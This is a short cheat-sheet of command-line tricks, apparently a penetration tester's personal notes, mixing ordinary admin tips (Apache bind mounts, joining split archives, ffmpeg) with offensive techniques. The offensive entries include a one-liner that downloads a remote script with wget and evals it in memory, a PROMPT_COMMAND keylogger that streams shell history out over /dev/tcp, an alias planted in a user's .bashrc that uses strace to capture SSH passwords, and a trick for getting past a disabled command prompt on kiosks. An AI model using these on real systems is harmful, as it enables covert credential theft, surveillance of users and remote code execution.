
Cool heredoc

  • Use when you are on a /bin/sh and need to su but dont want to go into a full tty

su - root <<!
ls /root
Password: uid=0(root) gid=0(root) groups=0(root)
Desktop  Documents  Downloads  go  Music  Pictures  Public  Templates  thinclient_drives  Videos

Bypass a disabled command prompt with /k

# Win+R (To bring up Run Box)
cmd.exe /k "whoami"

Description: 'This command prompt has been disabled by your administrator...' Can usually be seen in environments such as kiosks PCs, a quick hacky work around is to use /k via the windows run box. This will carry out the command and then show the restriction message, allowing for command execution.

Luks On USBs

Bash In memory exec one liner

bash -c CMD="`wget -qO- http://<ip>/script.sh`" && eval "$CMD"

Bash Keylogger

PROMPT_COMMAND='history -a; tail -n1 ~/.bash_history > /dev/tcp/'

SSH Client Strace Keylogger

  • Poor mans keylogger for ssh client but it works. Add to the users .bashrc

alias ssh='strace   -o   /tmp/sshpwd-`date    '+%d%h%m%s'`.log -e read,write,connect  -s2048 ssh' 
  • remember to source the .bashrc

  • source ~/.bashrc

Apache map external drive to webroot

  • Create a directory on the external HDD, assuming it is mounted under the /media directory, like so:

sudo mkdir /media/web_files
  • Change the ownership of this directory and all the files under it to be owned by the Apache user www-data like so:

sudo chown -R www-data:www-data /media/web_files/
  • Create a directory under the web root directory ie /var/www/html/ like so:

sudo mkdir /var/www/html/external_files
  • Bind the /media/web_files/ directory to the /var/www/html/external_files/ directory like so:

sudo mount --bind /media/web_files/ /var/www/html/external_files/
  • All files on the external HDD under the /media/web_files/ directory will be available for Apache under the /var/www/html/external_files/ directory and you can link to them in your web page that resides in /var/www/html/ like so:

<a href="external_files/file1.mp4">file1</a>

Unzip a chunked archive

  • you will see files ending in .001, .002 etc etc

  • You will need to join them first. You may use the common linux app, cat as in the example below:

    cat test.zip* > ~/test.zip

    This will concatenate all of your test.zip.001, test.zip.002, etc files into one larger, test.zip file. Once you have that single file, you may run unzip test.zip

ffmpeg -i input.mkv -codec copy output.mp4

Last updated